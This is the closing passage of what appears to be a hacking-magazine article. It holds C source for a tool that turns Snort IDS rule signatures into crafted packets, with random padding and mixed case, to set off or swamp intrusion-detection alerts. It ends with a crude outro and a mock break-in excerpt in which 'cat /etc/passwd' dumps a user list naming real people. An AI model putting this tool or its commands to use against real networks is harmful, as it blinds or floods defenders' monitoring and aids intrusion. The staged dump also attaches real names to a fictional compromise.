        for (pptr = availports; *pptr; pptr++) {
            if (r->dstport == *pptr) {
                i++;
            }
        }
    }
    return r;
}

/* verbose logging */
void
debug_printf (char *fmt, ...)
{
#ifdef XDEBUG
    va_list ap;
    char outbuf[1024];

    memset (outbuf, 0, sizeof (outbuf));
    va_start (ap, fmt);
    vsnprintf (outbuf, sizeof (outbuf) - 1, fmt, ap);
    fprintf (stderr, "%s", outbuf);
    va_end (ap);
#endif
    return;
}

/* convert a string to a port number */
unsigned short
getsrcport (char *portstr, char *proto)
{
    struct servent *se;
    unsigned short result;

    if (portstr == NULL)
        return 0;
    result = atoi (portstr);
    if (result)
        return result;
    if ((se = getservbyname (portstr, proto)) == NULL)
        return 0;
    result = ntohs (se->s_port);
    return result;
}

#define ABORT_PARSE { free (databuf); return NULL; }

/* parse content line... return the buffer and store its length in sizeptr */
void *
parse_content_string (char *line, unsigned int *sizeptr)
{
    char *ptr, *databuf = NULL;
    char *ptr2, *ptr3;

    *sizeptr = 0;
    ptr = ptr2 = line;
    while (*ptr) {
        /* regular character or escaped pipe */
        if ((*ptr != '|') || ((*ptr == '|') && (*(ptr - 1) == '\\'))) {
            (*sizeptr)++;
            databuf = xrealloc (databuf, *sizeptr);
            databuf[*sizeptr - 1] = *ptr;
            ptr++;
        } else {
            char numbuf[16];
            unsigned char byte;
            unsigned short word;
            unsigned int dword, dlen;

            /* deal with raw data in hex format */
            ptr++;
            while (*ptr) {
                unsigned char saved_char;

                while (isspace (*ptr))
                    ptr++;
                /* reached end of raw hex */
                if (*ptr == '|') {
                    ptr++;
                    goto outer_loop;
                }
                for (ptr3 = ptr;
                     (*ptr3 && (*ptr3 != '|') && (!isspace (*ptr3)));
                     ptr3++)
                    ;
                saved_char = *ptr3;
                if (!saved_char)
                    ABORT_PARSE
                *ptr3++ = 0;
                memset (numbuf, 0, sizeof (numbuf));
                strncpy (numbuf, ptr, sizeof (numbuf) - 1);
                ptr = ptr3;

                /* determine whether we are reading a
                 * hex byte, word, or double word */
                if (strlen (numbuf) <= 2) {
                    dlen = 1;
                    byte = strtoul (numbuf, NULL, 16);
                } else if (strlen (numbuf) <= 4) {
                    dlen = 2;
                    word = htons ((unsigned short) strtoul (numbuf, NULL, 16));
                } else if (strlen (numbuf) <= 8) {
                    dlen = 4;
                    dword = htonl (strtoul (numbuf, NULL, 16));
                } else            /* can't handle this yet */
                    ABORT_PARSE
                *sizeptr += dlen;
                databuf = xrealloc (databuf, *sizeptr);
                if (dlen == 1)
                    databuf[*sizeptr - 1] = byte;
                else if (dlen == 2)
                    memcpy (&databuf[*sizeptr - 2], &word, 2);
                else if (dlen == 4)
                    memcpy (&databuf[*sizeptr - 4], &dword, 4);
                if (saved_char == '|')
                    goto outer_loop;
            }
          outer_loop:
            ;
        }
    }
    ptr = ptr2;
    if (!*sizeptr)
        ABORT_PARSE
    return databuf;
}

void
dump_snort_data (struct snort_data *data)
{
#ifdef XDEBUG
    struct snort_data *ptr;

    for (ptr = data; ptr != NULL; ptr = ptr->next) {
        unsigned int i;

        fprintf (stderr, " offset = %d, distance = %d, within = %d, "
                 "case-sensitive = %d, len = %d, [", ptr->offset,
                 ptr->distance, ptr->within, ptr->case_insensitive,
                 ptr->attack_len);
        for (i = 0; i < ptr->attack_len; i++) {
            if (isprint (ptr->attack_data[i]))
                fprintf (stderr, "%c", ptr->attack_data[i]);
            else
                fprintf (stderr, "\\x%.2x", (unsigned char) ptr->attack_data[i]);
        }
        fprintf (stderr, "]\n");
    }
#endif
    return;
}

/* Mix the case of a case-insensitive string */
void
mix_case (char *ptr, unsigned int len)
{
    unsigned int i;

    for (i = 0; i < len; i++) {
        if (!isalpha (ptr[i]))
            continue;
        if ((rand ()) % 2)
            ptr[i] = tolower (ptr[i]);
        else
            ptr[i] = toupper (ptr[i]);
    }
    return;
}

/* using a snort rule framework, create a packet using polymorphism */
void *
create_data_packet (struct snort_rule *rule, unsigned int *sizeptr)
{
    struct snort_data *sptr;
    char *buf = NULL, *ptr;
    unsigned int buflen = 0;

    for (sptr = rule->sdata; sptr != NULL; sptr = sptr->next) {
        unsigned int inclen, oldlen, pos;

        /* pad with random filler up to the absolute offset, if any */
        pos = oldlen = buflen;
        buflen = XMAX(buflen, sptr->offset);
        buf = xrealloc (buf, buflen);
        ptr = buf;
        ptr += oldlen;
        fill_random_data (ptr, (buflen - oldlen));
        if (sptr->offset) {
            ptr = buf + sptr->offset;
            pos = sptr->offset;
        } else {
            unsigned int d, w, padbytes;

            /* relative match: pad by some amount between distance and within */
            d = sptr->distance;
            w = sptr->within;
            if (d && !w)
                w = d;
            /* this should never happen */
            if (d > w)
                d = w;
            oldlen = buflen;
            padbytes = random_number (d, w);
            inclen = buflen + padbytes;
            buf = xrealloc (buf, inclen);
            buflen = inclen;
            ptr = buf + oldlen;
            fill_random_data (ptr, padbytes);
            ptr += padbytes;
            pos += padbytes;
        }
        /* finally, fill in our data */
        buflen += sptr->attack_len;
        buf = xrealloc (buf, buflen);
        ptr = buf + pos;
        memcpy (ptr, sptr->attack_data, sptr->attack_len);
        if (sptr->case_insensitive)
            mix_case (ptr, sptr->attack_len);
    }

    /* finally, extend the buffer if dsize is specified and larger */
    if (rule->dsize && (buflen < rule->dsize)) {
        unsigned int oldblen = buflen;

        buflen = rule->dsize;
        buf = xrealloc (buf, buflen);
        ptr = buf;
        ptr += oldblen;
        fill_random_data (ptr, (buflen - oldblen));
    }
    *sizeptr = buflen;
    return buf;
}

/* fill buf with random data */
void
fill_random_data (char *buf, unsigned int len)
{
    unsigned int i;

    for (i = 0; i < len; i++) {
        /* let's not make it completely random */
        unsigned char randbyte = 0;

        while (!(isalnum (randbyte)))
            randbyte = (rand () & 0xff);
        buf[i] = (char) randbyte;
    }
    return;
}

/* generate random number between lo and hi */
int
random_number (int lo, int hi)
{
    int result;

    result = rand ();
    result %= ((hi - lo) + 1);
    result += lo;
    return result;
}

/* some implementations don't allow reallocs with 0 */
void *
xrealloc (void *ptr, size_t size)
{
    void *result;

    if (!size)
        size = 4;
    result = realloc (ptr, size);
    if (result == NULL) {
        perror ("realloc");
        exit (EXIT_FAILURE);
    }
    return result;
}

--[ 4. Outro

"I haven't been with a woman in nine months."
    - Mike Tyson

Fuck Snort.

Oh, and these techniques should of course be applicable to a variety of other
IDS's, all of which probably have rule lists imported from snort.

4.a Self-Promotion

You can expect a user's manual for my sneeze tool to appear as its own
separate article sometime in the near future. In addition, I would like to
notify you of my new and upcoming book, Hacker's Challenge Part III. Like the
past two books in this series, I discuss real life forensic and hacking
investigation conundrums and the solutions. These puzzles will get your axons
firing and stimulate your frontal cortex more than any other security book
you've ever seen.

"What does this have to do with this article?"
- you may inquisitively ask. Well, you may recall from above some of the poorly written snort rules. Attached is a small excerpt from Hacker's Challenge III. Match your wits against the attackers as you try to figure out how they "owned" this box. Would this break-in incident have occurred if the administrators would have written more rigorous snort rules? cd /home; cat /etc/passwd; root:*:0:0:Charlie &:/root:/usr/local/bin/tcsh daemon:*:1:1:The devil himself:/root:/sbin/nologin operator:*:2:5:System &:/operator:/sbin/nologin bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico www:*:67:67:HTTP server:/var/www:/sbin/nologin named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin roesch:*:1000:1000:Martin Roesch:/home/roesch:/usr/local/bin/tcsh jpavlick:*:1001:1001:John Pavlick:/home/jpavlick:/usr/local/bin/tcsh dr:*:1002:1002:Dragos Ruiu:/home/dr:/usr/local/bin/tcsh mikef:*:1003:1003:Mike Forostiak:/home/mikef:/usr/local/bin/tcsh tburgess:*:1004:1004:Tom Burgess:/home/tburgess:/usr/local/bin/tcsh bmc:*:1005:1005:Brian Caswell:/home/bmc:/usr/local/bin/tcsh phil:*:1006:1006:Phil Cataldi:/home/phil:/usr/local/bin/tcsh jed:*:1007:1007:Jed Haile:/home/jed:/usr/local/bin/tcsh andrewb:*:1008:1008:Andrew Baker:/home/andrewb:/usr/local/bin/tcsh sfuser1:*:1009:1009:remote user:/home/sfuser1:/bin/sh jasonl:*:1010:1010:Jason Larsen:/home/jasonl:/usr/local/bin/tcsh cmg:*:1011:1011:Chris Green:/home/cmg:/usr/local/bin/tcsh sschwing:*:1012:1012:Steve Schwinger:/home/sschwing:/usr/local/bin/tcsh ls -al *; andrewb: total 1116 drwxr-xr-x 6 andrewb andrewb 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. 
|=[ EOF ]=---------------------------------------------------------------=|